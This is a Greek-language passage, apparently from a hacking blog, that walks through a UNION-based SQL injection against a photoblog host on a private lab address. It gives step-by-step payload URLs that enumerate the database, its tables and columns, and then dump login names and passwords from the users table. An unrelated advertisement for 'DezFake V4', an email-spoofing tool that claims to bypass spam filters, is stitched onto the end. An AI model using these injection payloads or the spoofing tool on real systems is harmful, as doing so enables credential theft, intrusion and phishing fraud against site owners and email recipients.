http://192.168.1.26/cat.php?id=1 union all select 1,2,3,4-- Τώρα ας χρησιμοποιήσουμε ένα function για να δούμε άμα λειτουργεί παράδειγμα το database() οπότε τώρα :
http://192.168.1.26/cat.php?id=1 union all select 1,database(),3,4-- Και πήραμε : photoblog ας απάντηση. Τώρα ας συνεχίσουμε και να πάρουμε πληροφορίες από την βάση δεδομένων, ας πάρουμε όλα τα tables από την βάση δεδομένων :
http://192.168.1.26/cat.php?id=1 union all select 1,table_name,3,4 from information_schema.tables-- Τώρα άμα τα αποτελέσματα είναι πολλά μπορούνε να χρησιμοποιήσουμε το limit() function :
#Θα πάρουμε μόνο το πρώτο table. http://192.168.1.26/cat.php?id=1 union all select 1,table_name,3,4 from information_schema.tables limit 0,1--
#Θα πάρουμε μόνο το δεύτερο table. http://192.168.1.26/cat.php?id=1 union all select 1,table_name,3,4 from information_schema.tables limit 0,2--
#Θα πάρουμε μόνο το τρίτο table. http://192.168.1.26/cat.php?id=1 union all select 1,table_name,3,4 from information_schema.tables limit 0,3-- Τώρα θα πάρουμε τα columns names κάτω από ένα table το table μας τώρα είναι το users όπου θα περιέχει το username,password :
http://192.168.1.26/cat.php?id=1 union all select 1,column_name,3,4 from information_schema.columns where table_name='users'-- Και τέλος το καλύτερο μέρος οπού θα πάρουμε τα δεδομένα από τα columns που είναι : username , password :
http://192.168.1.26/cat.php?id=1 union all select 1,concat(login,password),3,4 from users-- Δεν ήταν κάτι το δύσκολο δεν είχαμε κανένα WAF μπροστά μας.. αυτό ήταν.
DezFake V4 | στείλετε ένα μήνυμα email από οποιοδήποτε email που σας αρέσει
Με αυτό το εργαλείο μπορείτε να στείλετε ένα μήνυμα ηλεκτρονικού ταχυδρομείου από οποιαδήποτε διεύθυνση ηλεκτρονικού ταχυδρομείου που σας αρέσει χωρίς να συνδεθείτε!
ΧΑΡΑΚΤΗΡΙΣΤΙΚΆ : HTML Supported [✓] Private Anonymous Server [✓] Bypass Spam Filters [✓]